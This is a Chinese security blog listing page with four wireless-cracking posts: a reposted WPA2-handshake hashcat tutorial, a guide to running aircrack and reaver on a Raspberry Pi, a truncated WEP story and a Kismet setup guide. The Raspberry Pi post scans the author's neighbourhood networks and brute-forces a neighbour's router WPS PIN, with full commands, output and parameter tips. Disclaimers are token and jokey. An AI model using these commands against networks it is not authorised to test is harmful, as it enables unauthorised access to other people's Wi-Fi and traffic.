Cracking WPA2 with Hashcat

作者:Secer 发布时间:February 21, 2014 分类:Linux笔记,无线安全

So for all those who got to see the show at Defcon's wireless village, that talk focused more on the drinking of the Rolling Rock than the cracking of the hashes.

I said in my ramblings that it was really really really easy.

Here is a how to...  with some example files for you to follow along with.

First you want to capture some traffic.  I leave the logistics of how up to you.

For this demo, we will be using a file which I grabbed online from the wireshark wiki.

http://wiki.wireshark.org/SampleCaptures?action=AttachFile&do=get&target=wpa-Induction.pcap

Now that you have some traffic in the form of a PCAP, fire up wireshark.

First thing I do is enter "eapol" in the search window.  This confirms we have a handshake.  You can skip this step if you really really want to but remember the whole trust but verify.

clip_image001

Since WPA2 salts with the SSID, it can help to know what that is.  Using the find menu in wireshark, search for the string SSID.

clip_image002

clip_image003

So the SSID is named "Coherer" which is good because at least it isn't Linksys.

Now here is the hardest part.  You need to convert your pcap file to a hccap file.  Hashcat has a cloud version of the tool which works awesome.  You can run some command line tools as well but the point of the talk was to not use aircrack.

https://hashcat.net/cap2hccap/

In real life, we all use aircrack so you can use 2 different commands.

I have used this...

aircrack-ng <cap> -J <hccap>

This could work as well...

wpaclean <out> <in>

wpaclean can damage your file so backup if you want to give it a try.

Now you have your hccap file.

Download the latest version of oclHashcat from here.

Run this below:

cudaHashcat-plus64.exe --hash-type 2500 wpa.hccap dict.txt

clip_image004

For the demo I used a dictionary with 1 word for demo speed but that word is in the rockyou list (entry 922007).

I use cudaHashcat-plus64.exe because I have a nVidia card as well as a 64 bit system.  The base application may change but the flags are the same and the passwords are still weak.

Happy cracking!

 

最近很忙,偷懒更新下博客,转自

http://www.n00bz.net/blog/2013/8/8/cracking-wpa2-with-hashcat.html

Raspberry Pi下跑aircrack和reaver破解路由器PIN码

作者:Secer 发布时间:December 28, 2012 分类:无线安全

[email protected]
声明:本文仅供安全学习用途 最近心血来潮,想把小区里的无线信号测试个遍。基于目前大多数路由器都支持wps,想必各位基友们都知道aircrack和reaver这两个工具,实属破解pin码,杀人越货,居家旅行之必备良药。像以前跑reaver这样的暴力工具一般都要24小时开着主机,实在浪费功耗,灰常的不绿色!不环保!
话说Raspberry Pi,作为一个攻击环境也是灰常给力的。国外的发烧友们已经针对这个板子,改造了专门用于网络攻击和测试的系统(基于debian) 不过今天这篇文章说的是如何在Raspberry Pi的官方发行版上安装aircrack和reaver ,我用的是苹果充电器+Mini usb 数据线给Raspberry Pi供电,带一个alfa的无线网卡足够了。功耗如此之低,实在是在线跑pin码。长期无线抓包的绝佳方案呢。

PS:懂得可以路过了…… 废话不多说,安装过程如下

1.准备系统环境

apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion

 

2.安装aircrack

svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng
cd aircrack-ng/
make
make install
cd ../

 

3.安装reaver

wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
make install
cd ../

 

4.使用 aircrack,寻找附近开启wps的路由器,邪恶……嘻嘻

airmon-ng start wlan0
airodump-ng mon0
CH 11 ][ Elapsed: 36 s ][ 2012-12-18 04:46
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
00:0E:2E:FD:C4:BB   -1        0        0    0  -1  -1                    &lt;length:  0&gt;
4C:E6:76:60:3F:20  -13      123        0    0  11  54e  WPA2 CCMP   PSK  cuier-1
B0:48:7A:52:F4:72  -23       42        0    0   1  54e. WPA2 CCMP   PSK  FAST_52F472
8C:21:0A:5F:A2:FA  -35       28        0    0   1  54e. WPA2 CCMP   PSK  TP-LINK_5FA2FA
E0:05:C5:D3:3F:00  -42       33        0    0   2  54e. WPA2 CCMP   PSK  TP-LINK_D33F00
EC:17:2F:7D:12:1E  -49       56        1    0   6  54e. WPA2 CCMP   PSK  wg7788
B0:48:7A:5D:22:EA  -51       36        0    0   6  54e. WPA2 CCMP   PSK  TP-LINK_1202
C4:CA:D9:6D:6F:B0  -52       30       10    0  11  54e. OPN              ChinaNet
8C:21:0A:8F:2F:1A  -54       18        0    0   1  54e. WPA2 CCMP   PSK  hechengyv
E0:05:C5:C5:70:E8  -55       15        0    0   4  54e. WPA2 CCMP   PSK  wtangqiu
C8:3A:35:55:D1:D8  -55       20        2    0   7  54e. WPA  CCMP   PSK  Tenda_55D1D8
8C:21:0A:84:89:8C  -56       24        0    0   1  54e. WPA2 CCMP   PSK  BATE
C4:CA:D9:6D:5F:60  -55       15        2    0   6  54e. OPN              ChinaNet
EC:17:2F:54:01:2E  -56       13        0    0   1  54e. WPA2 CCMP   PSK  diguadawang
5C:63:BF:74:56:52  -53       18        2    0   1  54e. WPA2 CCMP   PSK  cocohe
08:10:76:40:C2:92  -58       21        0    0   1  54e  WPA2 CCMP   PSK  flytv
E0:05:C5:C0:60:42  -56       21        0    0   9  54e. WPA2 CCMP   PSK  HZLYL
38:83:45:C1:BE:F8  -59       14        1    0   6  54e. WPA2 CCMP   PSK  TICO081122
C4:CA:D9:74:B3:80  -57       13        1    0  11  54e. OPN              ChinaNet
EC:88:8F:AB:F6:5E  -59        5        0    0   4  54e. WPA2 CCMP   PSK  TP-LINK_ABF65E
6C:E8:73:B0:67:78  -59        8        0    0   6  54e. WPA2 CCMP   PSK  WJJ~LOVE~WW
C8:3A:35:19:D6:78  -61        9        0    0   1  54e  WPA  CCMP   PSK  Tenda_19D678
E0:05:C5:19:9C:04  -61       18        0    0   7  54 . WPA2 CCMP   PSK  1-14-1-602
C8:64:C7:5A:46:16  -60        3        0    0  11  54e  WPA  CCMP   PSK  STB_CDCF
6C:E8:73:45:A7:E6  -60        6        0    0   4  54e. WPA2 CCMP   PSK  TP-LINK_45A7E6
1C:BD:B9:F5:E5:D7  -61       16        0    0   1  54   WPA2 CCMP   PSK  D-Link_DIR-600M
C4:CA:D9:6D:6E:B0  -61       12        0    0   1  54e. OPN              ChinaNet
C8:64:C7:5A:46:15  -61       17        0    0  11  54e  WPA  CCMP   PSK  VIDEOPHONE_CDCF
C8:64:C7:5A:46:17  -61       12        0    0  11  54e  WPA  CCMP   PSK  BACKUP
EC:88:8F:99:75:F2  -61        5        0    0   4  54e. WPA2 CCMP   PSK  6786
8C:21:0A:1E:60:26  -61        3        0    0   1  54e. WPA2 CCMP   PSK  yue
00:23:CD:5B:A7:9E  -61        2        0    0   6  54 . WEP  WEP         1203 wireless
14:E6:E4:44:9B:8E  -62        6        0    0   4  54e. WPA2 CCMP   PSK  bujiankai
00:1D:0F:81:72:06  -62        4        0    0   6  54 . WEP  WEP         Line
FC:C8:97:94:B6:C8  -62        7        0    0  11  54e  WPA  CCMP   PSK  CU_6cmn
B0:48:7A:2A:1B:E6  -62        7        0    0   6  54e. WPA  CCMP   PSK  302
EC:88:8F:8F:CD:BB  -62       11        0    0  11  54e. WPA2 CCMP   PSK  haloso2
EC:17:2F:AC:44:A2  -62        7        0    0   1  54e. WPA2 CCMP   PSK  1-401
C8:64:C7:5A:46:14  -63       24        0    0  11  54e  WPA  CCMP   PSK  CU_CDCF
38:83:45:B5:E3:96  -63        6        0    0   1  54e. WPA2 CCMP   PSK  TP-LINK_B5E396
C8:3A:35:2B:35:68  -63       11        0    0  11  54e  WPA2 CCMP   PSK  Tenda_2B3568
00:27:19:6D:4A:5A  -63        1        0    0  11  54e. WPA2 CCMP   PSK  JUJIA-FOGUANG
FC:C8:97:94:B6:CB  -65        9        0    0  11  54e  WPA  CCMP   PSK  BACKUP
FC:C8:97:94:B6:C9  -63       15        0    0  11  54e  WPA  CCMP   PSK  VIDEOPHONE_6cmn
C8:3A:35:06:63:B0  -64        3        0    0   1  54e  WPA2 CCMP   PSK  Tenda_0663B0
8C:21:0A:B0:22:92  -64        3        0    0   1  54e. WPA2 CCMP   PSK  810
14:E6:E4:4F:DE:FE  -64        3        0    0   1  54e. WPA2 CCMP   PSK  YM+ZM
FC:C8:97:94:B6:CA  -65       13        0    0  11  54e  WPA  CCMP   PSK  STB_6cmn
C8:3A:35:52:70:60  -65        2        0    0  11  54e. WPA  CCMP   PSK  Tenda_527060
00:26:5A:B3:08:7E  -65        8        0    0  13  54e  WPA2 CCMP   PSK  503
F4:EC:38:56:6B:DE  -62        2        0    0   9  54e. WPA2 CCMP   PSK  WTO
14:D6:4D:A0:19:60  -62        3        0    0  11  54e  WPA2 TKIP   PSK  wang~XB
C4:CA:D9:6D:6F:40  -62        1        0    0   1  54e. OPN              ChinaNet ctrl+c^ 

结束 话说小区里的无线信号还真是多呢……主要是alfa 的卡给力……呵呵 5.使用reaver 破解开启wps功能的路由器密码 比如这条,信号还不错

8C:21:0A:5F:A2:FA -35 28 0 0 1 54e. WPA2 CCMP PSK TP-LINK_5FA2FA

[email protected]:~/soft/reaver-1.4#  reaver  -i  mon0  -b 8C:21:0A:5F:A2:FA  -a  -S  -vv  -d2  -t 5 -c 1
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner &lt;[email protected]&gt;
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 8C:21:0A:5F:A2:FA
[+] Associated with 8C:21:0A:5F:A2:FA (ESSID: TP-LINK_5FA2FA)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01235678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
^C

 

这样就开始破解了哦,耐心等待结果就好了……不要太邪恶哦。做做测试还是可以的,要做个好童鞋……

########################################################################## 附上reaver调整参数的一些小技巧
reaver:
-i 监听后接口名称
-b 目标mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key(可以提高PJ速度)
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间
-c指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9参数防止路由僵死
示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
应因状况调整参数(-c后面都已目标频道为1作为例子)
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1

WEP无客户端,不在是谜 照样拿下

作者:Secer 发布时间:June 22, 2012 分类:Linux笔记,无线安全

发篇WEP无线破解入门教程:

很多朋友在学习WEP的时候没有客户端就停下了,现在我给你们带来福音了,没客户端照样拿下

故事是这样发生的,是一场偶遇

我朋友今天买了一个卡X,不知道怎么学习密码,打我电话把我教过去让我教他学习密码,朋友一场帮个忙,立马我打的跑去他家

帮他驱动安装好,进到BT3里面学习密码,我一看 DATA为0 后面没打钩,我当时感到很够呛的,心想朋友叫我来教他学习密码,

我却弄不出,不是很丢脸,不管3721的,我就选择了一个0841,然后让他一直处于读包状态,后来我就叫我朋友抽烟,边抽边聊着

聊得很广的,聊到了撒哈拉沙漠,聊到了奥巴马,最后聊到个女人。。烟也抽完了,我走进电脑一看,读包栏里的DATA还是很大很圆的

一个O,我心想希望没了,还是不涨,我朋友就问我还要多久,我说快了。

没办法,把自己的本本拿出来插上卡X进BT3,用命令学习,看能不能学习到

立马键盘上一顿狂输,命令一条条的出现,快到与目标AP进行虚拟连接的这一步了,脑中里一道灵光闪出

心想,用本本进行虚拟连接,看能让朋友那台的DATA升起来不,立刻我输入命令,如果之后,我一步步走进

我朋友的电脑,心里默念到(菩萨保佑 耶稣保佑 南无阿弥陀佛)当我没迈进朋友电脑一步,我心就跳很快

心想,你千万得升啊,不升我就颠了。。。终于到了电脑朋友一看,我一看傻了DATA是狂升,几百几百的升

我立刻把目光锁定到客户端一看00:1A:EF:0A:38:38这地址好熟悉啊,马上跑到自己本本把SHELL往上拉,拉到

阅读剩余部分...

无线利器Kismet基本使用/破解无线密码

作者:Secer 发布时间:December 31, 2011 分类:无线安全

Kismet(http://www.kismetwireless.net /)是一款针对802.11b无线网络嗅探器,它用来捕捉区域中无线网络的相 关信息。

功能有:支持大多数无线网卡(Linksys, D-Link, Rangelan, Cisco Aironet cards, and Orinoco based cards),能通过UDP、ARP、DHCP数据包自动实现网络IP阻塞检测,能通过Cisco Discovery协议列出Cisco设备,弱加密数据包记录,和Ethereal、tcpdump兼容的数据包dump文件,绘制探测到的网络图和估计 网络范围。

1、 支持CiscoCDP数据处理证书。

2、 支持WEP(Wired Equivalent Privacy)数据包解码。WEP安全技术源自于名为RC4的RSA数据加密技术,以满足用户更高层次的网络安全需求。

3、 自动探测每一个无线接入点(AP,Access Point)的结构。

4、 自动将数据转换为可视化的图表。

5、 Kisme支持WEP(Wired Equivalent Privacy)加密技术,WEP安全技术源自于名为RC4的RSA数据加密技术,以满足用户更高层次的网络安全需求。

通常情况下Kismet 2.71可以通过500000-1000000个通信数据包(时间在3-6个小时,加入攻击方法,几分钟就行)就能破解WEP的key

Kisme安装配置实例

A. 在Ubuntu9.04  intel5100网卡下安装配置Kismet

配置Kismet编辑:格式Source=type,interface,name[,channel]
#sudo vim /etc/kismet/kismet.conf
最新的5100的无线网卡的需要设置为

Source= iwl4965, wlan0, intel5100

如果你还想需要在SHELL下使用curses(有图形介面的使用)模式运行的话:
#sudo vim /etc/kismet/kismet_ui.conf
编辑:
gui=curses

启动Kismet
首先必须激活WNIC,然后让WNIC处于混杂(监听)模式:
#sudo ifconfig wlan0 down #关掉网卡,这样才可以设置
#sudo iwconfig wlan0 mode monitor
#ifconfig wlan0 up

最后运行kismet脚本:
#kismet
之后就能成功进入Kismet界面了。

B. 在Fedora Fedora 2 Atheros网卡下配置

系统:RedHat Fedora Core 2
WNIC:标准Atheros/802.11G/PCI无线网卡
驱动:madwifi-ng-r1531-20060427
编译器:gcc version 3.3.3 20040412 (Red Hat Linux 3.3.3-7)

安装Kismet
#cd /usr/local/sbin
#wget http://demonalex.3322.org/download/wireless/kismet-2006-04-R1.tar.gz
#tar -zxvf kismet-2006-04-R1.tar.gz
#cd kismet-2006-04-R1
#./configure --disable-setuid
#make dep
#make && make install

阅读剩余部分...